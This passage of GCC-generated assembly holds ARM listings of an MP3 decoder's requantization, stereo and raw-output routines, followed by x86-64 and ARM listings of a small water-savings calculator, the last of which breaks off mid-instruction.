lsl r2, r3, #3 sub r2, r2, r3 lsl r3, r2, #1 mov r2, r3 add r2, r1, r2 ldr r3, [fp, #-44] add r3, r2, r3 ldr r3, [r0, r3, lsl #2] mov r0, r3 bl __aeabi_ui2f mov r3, r0 ldr r1, [fp, #-20] @ float mov r0, r3 bl __aeabi_fadd mov r3, r0 ldr r1, [fp, #-24] @ float mov r0, r3 bl __aeabi_fmul mov r3, r0 eor r3, r3, #-2147483648 mov r0, r3 bl __aeabi_f2d mov r2, r0 mov r3, r1 mov r0, #0 mov r1, #1073741824 bl pow mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2f mov r3, r0 str r3, [fp, #-16] @ float ldr r1, .L478 ldr r3, [fp, #-32] lsl r2, r3, #1 ldr r3, [fp, #-36] add r3, r2, r3 add r3, r3, #18 ldr r3, [r1, r3, lsl #2] sub r3, r3, #210 mov r0, r3 bl __aeabi_i2d mov r2, #0 ldr r3, .L478+12 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, #0 mov r1, #1073741824 bl pow mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2f mov r3, r0 str r3, [fp, #-12] @ float ldr r0, .L478+8 ldr r3, [fp, #-36] ldr r1, [fp, #-32] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #228 ldr r3, [r0, r3, lsl #2] @ float mov r1, #0 mov r0, r3 bl __aeabi_fcmplt mov r3, r0 cmp r3, #0 beq .L477 ldr r0, .L478+8 ldr r3, [fp, #-36] ldr r1, [fp, #-32] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #228 ldr r3, [r0, r3, lsl #2] @ float eor r3, r3, #-2147483648 mov r0, r3 bl __aeabi_f2uiz mov r3, r0 mov r0, r3 bl Requantize_Pow_43 mov r3, r0 eor r3, r3, #-2147483648 str r3, [fp, #-28] @ float b .L474 .L477: ldr r0, .L478+8 ldr r3, [fp, #-36] ldr r1, [fp, #-32] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #228 ldr r3, [r0, r3, lsl #2] @ float mov r0, r3 bl __aeabi_f2uiz mov r3, r0 mov r0, r3 bl Requantize_Pow_43 str r0, [fp, #-28] @ float .L474: ldr r1, [fp, #-12] @ float ldr r0, [fp, #-16] @ float bl __aeabi_fmul mov r3, r0 ldr r1, [fp, #-28] @ float mov r0, r3 bl __aeabi_fmul mov r3, r0 mov ip, r3 ldr r0, .L478+8 ldr r3, [fp, #-36] ldr r1, [fp, #-32] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #228 str ip, [r0, r3, lsl #2] @ float ldr r0, .L478+8 ldr r3, [fp, #-36] ldr r1, [fp, #-32] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #228 ldr r3, [r0, r3, lsl #2] @ float str r3, [fp, #-8] @ float nop sub sp, fp, #4 @ sp needed pop {fp, pc} .L479: .align 2 .L478: .word g_side_info .word pretab.7869 .word g_main_data .word 1070596096 .size Requantize_Process_Long, .-Requantize_Process_Long .align 2 .syntax unified .arm .fpu softvfp .type Requantize_Process_Short, %function Requantize_Process_Short: @ args = 4, pretend = 0, frame = 40 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #44 str r0, [fp, #-40] str r1, [fp, #-44] str r2, [fp, #-48] str r3, [fp, #-52] ldr r1, .L489 ldr r3, [fp, #-40] lsl r2, r3, #1 ldr r3, [fp, #-44] add r3, r2, r3 add r3, r3, #74 ldr r3, [r1, r3, lsl #2] cmp r3, #0 beq .L481 mov r3, #1065353216 b .L482 .L481: mov r3, #1056964608 .L482: str r3, [fp, #-32] @ float ldr ip, .L489+4 ldr r3, [fp, #-52] ldr r0, [fp, #-44] ldr r1, [fp, #-40] mov r2, r3 lsl r2, r2, #1 add r2, r2, r3 mov r3, r0 lsl r3, r3, #3 add r3, r3, r0 lsl r3, r3, #2 add r2, r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #3 add r2, r2, r3 ldr r3, [fp, #4] add r3, r2, r3 add r3, r3, #84 ldr r3, [ip, r3, lsl #2] mov r0, r3 bl __aeabi_ui2f mov r3, r0 ldr r1, [fp, #-32] @ float mov r0, r3 bl __aeabi_fmul mov r3, r0 eor r3, r3, #-2147483648 mov r0, r3 bl __aeabi_f2d mov r2, r0 mov r3, r1 mov r0, #0 mov r1, #1073741824 bl pow mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2f mov r3, r0 str r3, [fp, #-28] @ float ldr r1, .L489 ldr r3, [fp, #-40] lsl r2, r3, #1 ldr r3, [fp, #-44] add r3, r2, r3 add r3, r3, #18 ldr r3, [r1, r3, lsl #2] mov r0, r3 bl __aeabi_ui2f mov r3, r0 ldr r1, .L489+8 mov r0, r3 bl __aeabi_fsub mov r3, r0 mov r4, r3 ldr r0, .L489 ldr r3, [fp, #-44] ldr r1, [fp, #-40] mov r2, r3 lsl r2, r2, #1 add r2, r2, r3 mov r3, r1 lsl r3, r3, #1 add r3, r3, r1 lsl r3, r3, #1 add r2, r2, r3 ldr r3, [fp, #4] add r3, r2, r3 add r3, r3, #50 ldr r3, [r0, r3, lsl #2] mov r0, r3 bl __aeabi_ui2f mov r3, r0 mov r1, #1090519040 mov r0, r3 bl __aeabi_fmul mov r3, r0 mov r1, r3 mov r0, r4 bl __aeabi_fsub mov r3, r0 mov r1, #1048576000 mov r0, r3 bl __aeabi_fmul mov r3, r0 mov r0, r3 bl __aeabi_f2d mov r2, r0 mov r3, r1 mov r0, #0 mov r1, #1073741824 bl pow mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2f mov r3, r0 str r3, [fp, #-24] @ float ldr r0, .L489+4 ldr r3, [fp, #-44] ldr r1, [fp, #-40] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-48] add r3, r2, r3 add r3, r3, #228 ldr r3, [r0, r3, lsl #2] @ float mov r1, #0 mov r0, r3 bl __aeabi_fcmplt mov r3, r0 cmp r3, #0 beq .L488 ldr r0, .L489+4 ldr r3, [fp, #-44] ldr r1, [fp, #-40] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-48] add r3, r2, r3 add r3, r3, #228 ldr r3, [r0, r3, lsl #2] @ float eor r3, r3, #-2147483648 mov r0, r3 bl __aeabi_f2uiz mov r3, r0 mov r0, r3 bl Requantize_Pow_43 mov r3, r0 eor r3, r3, #-2147483648 b .L485 .L488: ldr r0, .L489+4 ldr r3, [fp, #-44] ldr r1, [fp, #-40] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-48] add r3, r2, r3 add r3, r3, #228 ldr r3, [r0, r3, lsl #2] @ float mov r0, r3 bl __aeabi_f2uiz mov r3, r0 mov r0, r3 bl Requantize_Pow_43 mov r3, r0 .L485: str r3, [fp, #-20] @ float ldr r1, [fp, #-24] @ float ldr r0, [fp, #-28] @ float bl __aeabi_fmul mov r3, r0 ldr r1, [fp, #-20] @ float mov r0, r3 bl __aeabi_fmul mov r3, r0 mov ip, r3 ldr r0, .L489+4 ldr r3, [fp, #-44] ldr r1, [fp, #-40] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-48] add r3, r2, r3 add r3, r3, #228 str ip, [r0, r3, lsl #2] @ float ldr r0, .L489+4 ldr r3, [fp, #-44] ldr r1, [fp, #-40] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-48] add r3, r2, r3 add r3, r3, #228 ldr r3, [r0, r3, lsl #2] @ float str r3, [fp, #-16] @ float nop sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .L490: .align 2 .L489: .word g_side_info .word g_main_data .word 1129447424 .size Requantize_Process_Short, .-Requantize_Process_Short .global __aeabi_fdiv .align 2 .syntax unified .arm .fpu softvfp .type Stereo_Process_Intensity_Long, %function Stereo_Process_Intensity_Long: @ args = 0, pretend = 0, frame = 48 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #52 str r0, [fp, #-56] str r1, [fp, #-60] ldr r1, .L499 ldr r2, [fp, #-56] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r2, r3, #3 sub r2, r2, r3 lsl r3, r2, #1 mov r2, r3 ldr r3, [fp, #-60] add r3, r2, r3 ldr r3, [r1, r3, lsl #2] str r3, [fp, #-36] ldr r3, [fp, #-36] cmp r3, #7 beq .L498 ldr r3, .L499+4 ldr r3, [r3, #16] str r3, [fp, #-32] ldr r1, .L499+8 ldr r2, [fp, #-32] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 ldr r2, [fp, #-60] add r3, r3, r2 ldr r3, [r1, r3, lsl #2] str r3, [fp, #-28] ldr r3, [fp, #-60] add r1, r3, #1 ldr r0, .L499+8 ldr r2, [fp, #-32] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 ldr r3, [r0, r3, lsl #2] str r3, [fp, #-24] ldr r3, [fp, #-36] cmp r3, #6 bne .L493 mov r3, #1065353216 str r3, [fp, #-44] @ float mov r3, #0 str r3, [fp, #-40] @ float b .L494 .L493: ldr r2, .L499+12 ldr r3, [fp, #-36] ldr r4, [r2, r3, lsl #2] @ float ldr r2, .L499+12 ldr r3, [fp, #-36] ldr r3, [r2, r3, lsl #2] @ float mov r1, #1065353216 mov r0, r3 bl __aeabi_fadd mov r3, r0 mov r1, r3 mov r0, r4 bl __aeabi_fdiv mov r3, r0 str r3, [fp, #-44] @ float ldr r2, .L499+12 ldr r3, [fp, #-36] ldr r3, [r2, r3, lsl #2] @ float mov r1, #1065353216 mov r0, r3 bl __aeabi_fadd mov r3, r0 mov r1, r3 mov r0, #1065353216 bl __aeabi_fdiv mov r3, r0 str r3, [fp, #-40] @ float .L494: ldr r3, [fp, #-28] str r3, [fp, #-48] b .L495 .L496: ldr r1, .L499 ldr r2, [fp, #-56] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #7 ldr r2, [fp, #-48] add r3, r3, r2 add r3, r3, #228 ldr r3, [r1, r3, lsl #2] @ float mov r1, r3 ldr r0, [fp, #-44] @ float bl __aeabi_fmul mov r3, r0 str r3, [fp, #-20] @ float ldr r1, .L499 ldr r2, [fp, #-56] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #7 ldr r2, [fp, #-48] add r3, r3, r2 add r3, r3, #228 ldr r3, [r1, r3, lsl #2] @ float mov r1, r3 ldr r0, [fp, #-40] @ float bl __aeabi_fmul mov r3, r0 str r3, [fp, #-16] @ float ldr r1, .L499 ldr r2, [fp, #-56] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #7 ldr r2, [fp, #-48] add r3, r3, r2 add r3, r3, #228 ldr r2, [fp, #-20] @ float str r2, [r1, r3, lsl #2] @ float ldr r1, .L499 ldr r2, [fp, #-56] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #7 ldr r2, [fp, #-48] add r3, r3, r2 add r3, r3, #804 ldr r2, [fp, #-16] @ float str r2, [r1, r3, lsl #2] @ float ldr r3, [fp, #-48] add r3, r3, #1 str r3, [fp, #-48] .L495: ldr r2, [fp, #-48] ldr r3, [fp, #-24] cmp r2, r3 bcc .L496 nop .L498: nop sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .L500: .align 2 .L499: .word g_main_data .word g_frame_header .word g_sf_band_indices .word is_ratios .size Stereo_Process_Intensity_Long, .-Stereo_Process_Intensity_Long .global __aeabi_d2uiz .align 2 .syntax unified .arm .fpu softvfp .type Stereo_Process_Intensity_Short, %function Stereo_Process_Intensity_Short: @ args = 0, pretend = 0, frame = 56 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, fp, lr} add fp, sp, #12 sub sp, sp, #56 str r0, [fp, #-64] str r1, [fp, #-68] ldr r3, .L510 ldr r3, [r3, #16] str r3, [fp, #-48] ldr r3, [fp, #-68] add r1, r3, #1 ldr r0, .L510+4 ldr r2, [fp, #-48] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r1, [r3, #4] ldr r0, .L510+4 ldr r2, [fp, #-48] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 ldr r2, [fp, #-68] add r3, r3, r2 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r3, [r3, #4] sub r3, r1, r3 str r3, [fp, #-44] mov r3, #0 str r3, [fp, #-52] b .L502 .L508: ldr r0, .L510+8 ldr r3, [fp, #-68] ldr r1, [fp, #-64] mov r2, r3 lsl r2, r2, #1 add r2, r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #3 add r2, r2, r3 ldr r3, [fp, #-52] add r3, r2, r3 add r3, r3, #84 ldr r3, [r0, r3, lsl #2] str r3, [fp, #-40] ldr r3, [fp, #-40] cmp r3, #7 beq .L503 ldr r1, .L510+4 ldr r2, [fp, #-48] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 ldr r2, [fp, #-68] add r3, r3, r2 add r3, r3, #22 lsl r3, r3, #2 add r3, r1, r3 ldr r2, [r3, #4] mov r3, r2 lsl r3, r3, #1 add r2, r3, r2 ldr r3, [fp, #-44] ldr r1, [fp, #-52] mul r3, r1, r3 add r3, r2, r3 str r3, [fp, #-36] ldr r2, [fp, #-36] ldr r3, [fp, #-44] add r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-40] cmp r3, #6 bne .L504 mov r3, #1 str r3, [fp, #-28] mov r3, #0 str r3, [fp, #-24] b .L505 .L504: ldr r2, .L510+12 ldr r3, [fp, #-40] ldr r3, [r2, r3, lsl #2] @ float mov r0, r3 bl __aeabi_f2d mov r4, r0 mov r5, r1 ldr r2, .L510+12 ldr r3, [fp, #-40] ldr r3, [r2, r3, lsl #2] @ float mov r0, r3 bl __aeabi_f2d mov r2, #0 ldr r3, .L510+16 bl __aeabi_dadd mov r2, r0 mov r3, r1 mov r0, r4 mov r1, r5 bl __aeabi_ddiv mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2uiz mov r3, r0 str r3, [fp, #-28] ldr r2, .L510+12 ldr r3, [fp, #-40] ldr r3, [r2, r3, lsl #2] @ float mov r0, r3 bl __aeabi_f2d mov r2, #0 ldr r3, .L510+16 bl __aeabi_dadd mov r2, r0 mov r3, r1 mov r0, #0 ldr r1, .L510+16 bl __aeabi_ddiv mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2uiz mov r3, r0 str r3, [fp, #-24] .L505: ldr r3, [fp, #-36] str r3, [fp, #-56] b .L506 .L507: ldr r1, .L510+8 ldr r2, [fp, #-64] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #7 ldr r2, [fp, #-56] add r3, r3, r2 add r3, r3, #228 ldr r3, [r1, r3, lsl #2] @ float mov r0, r3 bl __aeabi_f2uiz mov r3, r0 str r3, [fp, #-28] ldr r0, [fp, #-28] bl __aeabi_ui2f mov r3, r0 str r3, [fp, #-20] @ float ldr r1, .L510+8 ldr r2, [fp, #-64] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #7 ldr r2, [fp, #-56] add r3, r3, r2 add r3, r3, #228 ldr r3, [r1, r3, lsl #2] @ float mov r0, r3 bl __aeabi_f2uiz mov r3, r0 str r3, [fp, #-24] ldr r0, [fp, #-24] bl __aeabi_ui2f mov r3, r0 str r3, [fp, #-16] @ float ldr r1, .L510+8 ldr r2, [fp, #-64] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #7 ldr r2, [fp, #-56] add r3, r3, r2 add r3, r3, #228 ldr r2, [fp, #-20] @ float str r2, [r1, r3, lsl #2] @ float ldr r1, .L510+8 ldr r2, [fp, #-64] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #7 ldr r2, [fp, #-56] add r3, r3, r2 add r3, r3, #804 ldr r2, [fp, #-16] @ float str r2, [r1, r3, lsl #2] @ float ldr r3, [fp, #-56] add r3, r3, #1 str r3, [fp, #-56] .L506: ldr r2, [fp, #-56] ldr r3, [fp, #-32] cmp r2, r3 bcc .L507 .L503: ldr r3, [fp, #-52] add r3, r3, #1 str r3, [fp, #-52] .L502: ldr r3, [fp, #-52] cmp r3, #2 bls .L508 nop sub sp, fp, #12 @ sp needed pop {r4, r5, fp, pc} .L511: .align 2 .L510: .word g_frame_header .word g_sf_band_indices .word g_main_data .word is_ratios .word 1072693248 .size Stereo_Process_Intensity_Short, .-Stereo_Process_Intensity_Short .align 2 .syntax unified .arm .fpu softvfp .type audio_write, %function audio_write: @ args = 0, pretend = 0, frame = 32 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #36 str r0, [fp, #-24] str r1, [fp, #-28] str r2, [fp, #-32] mov r3, #16 str r3, [fp, #-16] ldr r3, .L514 str r3, [fp, #-12] mov r3, #2 str r3, [fp, #-8] nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L515: .align 2 .L514: .word 44100 .size audio_write, .-audio_write .section .rodata .align 2 .LC21: .ascii "%s.raw\000" .align 2 .LC22: .ascii "Unable to write raw data\012\000" .align 2 .LC23: .word __stack_chk_guard .text .align 2 .syntax unified .arm .fpu softvfp .type audio_write_raw, %function audio_write_raw: @ args = 0, pretend = 0, frame = 3360 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #3360 str r0, [fp, #-3360] str r1, [fp, #-3364] ldr r3, .L529 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 ldr r3, .L529+4 ldr r3, [r3] cmp r3, #0 bne .L517 ldr r3, .L529+4 mov r2, #1 str r2, [r3] ldr r3, .L529+8 ldr r3, [r3] ldr r1, .L529+12 mov r0, r3 bl strcmp mov r3, r0 cmp r3, #0 beq .L518 ldr r3, .L529+8 ldr r2, [r3] sub r3, fp, #1024 sub r3, r3, #4 sub r3, r3, #4 ldr r1, .L529+16 mov r0, r3 bl sprintf sub r3, fp, #1024 sub r3, r3, #4 sub r3, r3, #4 ldr r2, .L529+20 mov r1, #65 mov r0, r3 bl open mov r3, r0 ldr r2, .L529+24 str r3, [r2] ldr r3, .L529+24 ldr r3, [r3] cmn r3, #1 bne .L517 sub r3, fp, #1024 sub r3, r3, #4 sub r3, r3, #4 mov r0, r3 bl perror mvn r0, #0 bl exit .L518: ldr r3, .L529+24 mov r2, #1 str r2, [r3] .L517: ldr r3, .L529+28 ldr r3, [r3, #28] cmp r3, #3 bne .L519 mov r3, #1 b .L520 .L519: mov r3, #2 .L520: str r3, [fp, #-3348] mov r3, #0 str r3, [fp, #-3352] b .L521 .L524: ldr r3, [fp, #-3348] cmp r3, #1 bne .L522 ldr r3, [fp, #-3352] lsl r3, r3, #2 ldr r2, [fp, #-3360] add r3, r2, r3 ldr r3, [r3] lsl r3, r3, #16 lsr r3, r3, #16 str r3, [fp, #-3344] ldr r3, [fp, #-3344] lsl r3, r3, #16 lsr r2, r3, #16 sub r3, fp, #4 sub r3, r3, #3328 sub r3, r3, #4 ldr r1, [fp, #-3352] lsl r1, r1, #1 add r3, r3, r1 strh r2, [r3] @ movhi b .L523 .L522: ldr r3, [fp, #-3352] lsl r3, r3, #2 ldr r2, [fp, #-3360] add r3, r2, r3 ldr r3, [r3] lsl r3, r3, #16 lsr r3, r3, #16 str r3, [fp, #-3344] ldr r3, [fp, #-3352] lsl r3, r3, #2 ldr r2, [fp, #-3360] add r3, r2, r3 ldr r3, [r3] lsr r3, r3, #16 str r3, [fp, #-3340] ldr r3, [fp, #-3352] lsl r1, r3, #1 ldr r3, [fp, #-3340] lsl r3, r3, #16 lsr r2, r3, #16 sub r3, fp, #4 sub r3, r3, #3328 sub r3, r3, #4 lsl r1, r1, #1 add r3, r3, r1 strh r2, [r3] @ movhi ldr r3, [fp, #-3352] lsl r3, r3, #1 add r1, r3, #1 ldr r3, [fp, #-3344] lsl r3, r3, #16 lsr r2, r3, #16 sub r3, fp, #4 sub r3, r3, #3328 sub r3, r3, #4 lsl r1, r1, #1 add r3, r3, r1 strh r2, [r3] @ movhi .L523: ldr r3, [fp, #-3352] add r3, r3, #1 str r3, [fp, #-3352] .L521: ldr r3, [fp, #-3352] ldr r2, [fp, #-3364] cmp r2, r3 bhi .L524 ldr r3, .L529+24 ldr r0, [r3] ldr r3, [fp, #-3348] ldr r2, [fp, #-3364] mul r3, r2, r3 lsl r2, r3, #1 sub r3, fp, #3328 sub r3, r3, #4 sub r3, r3, #4 mov r1, r3 bl write mov r3, r0 mov r1, r3 ldr r3, [fp, #-3348] ldr r2, [fp, #-3364] mul r3, r2, r3 lsl r3, r3, #1 cmp r1, r3 beq .L528 mvn r1, #0 ldr r0, .L529+32 bl Error nop .L528: nop ldr r3, .L529 ldr r2, [r3] ldr r3, [fp, #-8] eors r2, r3, r2 mov r3, #0 beq .L527 bl __stack_chk_fail .L527: sub sp, fp, #4 @ sp needed pop {fp, pc} .L530: .align 2 .L529: .word .LC23 .word init.7935 .word filename .word .LC11 .word .LC21 .word 438 .word fd.7936 .word g_frame_header .word .LC22 .size audio_write_raw, .-audio_write_raw .section .rodata .align 2 .LC24: .ascii "Not enough maindata to decode frame\012\000" .text .align 2 .global pdmp3 .syntax unified .arm .fpu softvfp .type pdmp3, %function pdmp3: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] ldr r3, [fp, #-8] ldr r3, [r3] mov r2, #8 mov r1, r3 ldr r0, .L541 bl strncmp mov r3, r0 cmp r3, #0 bne .L533 ldr r3, [fp, #-8] add r2, r3, #4 str r2, [fp, #-8] ldr r3, [r3] ldr r2, .L541+4 str r3, [r2] b .L533 .L539: ldr r3, [fp, #-8] add r2, r3, #4 str r2, [fp, #-8] ldr r3, [r3] ldr r2, .L541+8 str r3, [r2] b .L534 .L538: bl Read_Frame mov r3, r0 cmp r3, #0 bne .L535 bl Decode_L3 b .L534 .L535: bl Get_Filepos mov r3, r0 cmn r3, #1 beq .L540 ldr r3, .L541+12 ldr r3, [r3] mov r2, #36 mov r1, #1 ldr r0, .L541+16 bl fwrite ldr r3, .L541+12 ldr r3, [r3] mov r1, r3 mov r0, #10 bl fputc .L534: bl Get_Filepos mov r3, r0 cmn r3, #1 bne .L538 b .L537 .L540: nop .L537: bl Close_File .L533: ldr r3, [fp, #-8] ldr r3, [r3] cmp r3, #0 bne .L539 nop nop sub sp, fp, #4 @ sp needed pop {fp, pc} .L542: .align 2 .L541: .word .LC0 .word audio_name .word filename .word stderr .word .LC24 .size pdmp3, .-pdmp3 .data .align 2 .type init.7571, %object .size init.7571, 4 init.7571: .word 1 .local g_imdct_win.7570 .comm g_imdct_win.7570,576,4 .local store.7664 .comm store.7664,4608,4 .align 2 .type init.7775, %object .size init.7775, 4 init.7775: .word 1 .local g_synth_n_win.7780 .comm g_synth_n_win.7780,8192,4 .local v_vec.7781 .comm v_vec.7781,8192,4 .align 2 .type pretab.7869, %object .size pretab.7869, 84 pretab.7869: .word 0 .word 0 .word 0 .word 0 .word 0 .word 0 .word 0 .word 0 .word 0 .word 0 .word 0 .word 1065353216 .word 1065353216 .word 1065353216 .word 1065353216 .word 1073741824 .word 1073741824 .word 1077936128 .word 1077936128 .word 1077936128 .word 1073741824 .local curr_sample_rate.7926 .comm curr_sample_rate.7926,4,4 .local audio.7925 .comm audio.7925,4,4 .local init.7924 .comm init.7924,4,4 .local init.7935 .comm init.7935,4,4 .local fd.7936 .comm fd.7936,4,4 .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "872779.c" .intel_syntax noprefix .text .section .rodata .LC2: .string "Enter the number of people " .LC3: .string "%d" .LC4: .string "Cost of installation %d \n" .align 8 .LC5: .string "Ammount of water saved %.2f liters/day\n" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax movss xmm0, DWORD PTR .LC0[rip] movss DWORD PTR -20[rbp], xmm0 movss xmm0, DWORD PTR .LC1[rip] movss DWORD PTR -16[rbp], xmm0 lea rdi, .LC2[rip] mov eax, 0 call printf@PLT lea rax, -24[rbp] mov rsi, rax lea rdi, .LC3[rip] mov eax, 0 call __isoc99_scanf@PLT mov eax, DWORD PTR -24[rbp] movsx rdx, eax imul rdx, rdx, 1431655766 shr rdx, 32 sar eax, 31 mov ecx, eax mov eax, edx sub eax, ecx mov DWORD PTR -12[rbp], eax mov eax, DWORD PTR -12[rbp] imul eax, eax, 150 mov esi, eax lea rdi, .LC4[rip] mov eax, 0 call printf@PLT pxor xmm0, xmm0 cvtsi2ss xmm0, DWORD PTR -12[rbp] mulss xmm0, DWORD PTR -20[rbp] pxor xmm1, xmm1 cvtsi2ss xmm1, DWORD PTR -12[rbp] mulss xmm1, DWORD PTR -16[rbp] subss xmm0, xmm1 pxor xmm2, xmm2 cvtss2sd xmm2, xmm0 movq rax, xmm2 movq xmm0, rax lea rdi, .LC5[rip] mov eax, 1 call printf@PLT mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L3 call __stack_chk_fail@PLT .L3: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .section .rodata .align 4 .LC0: .long 1129447424 .align 4 .LC1: .long 1105199104 .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "872779.c" .text .section .rodata .align 2 .LC0: .ascii "Enter the number of people \000" .align 2 .LC1: .ascii "%d\000" .align 2 .LC2: .ascii "Cost of installation %d \012\000" .global __aeabi_i2f .global __aeabi_fmul .global __aeabi_fsub .global __aeabi_f2d .align 2 .LC3: .ascii "Ammount of water saved %.2f liters/day\012\000" .align 2 .LC4: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #28 ldr r3, .L4 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 ldr r3, .L4+4 str r3, [fp, #-28] @ float ldr r3, .L4+8 str r3, [fp, #-24] @ float ldr r0, .L4+12 bl printf sub r3, fp, #32 mov r1, r3 ldr r0, .L4+16 bl __isoc99_scanf ldr r3, [fp, #-32] ldr r2, .L4+20 smull r1, r2, r3, r2 asr r3, r3, #31 sub r3, r2, r3 str r3, [fp, #-20] ldr r2, [fp, #-20] mov r3, r2 lsl r3, r3, #2 add r3, r3, r2 lsl r2, r3, #4 sub r2, r2, r3 lsl r3, r2, #1 mov r2, r3 mov r3, r2 mov r1, r3 ldr 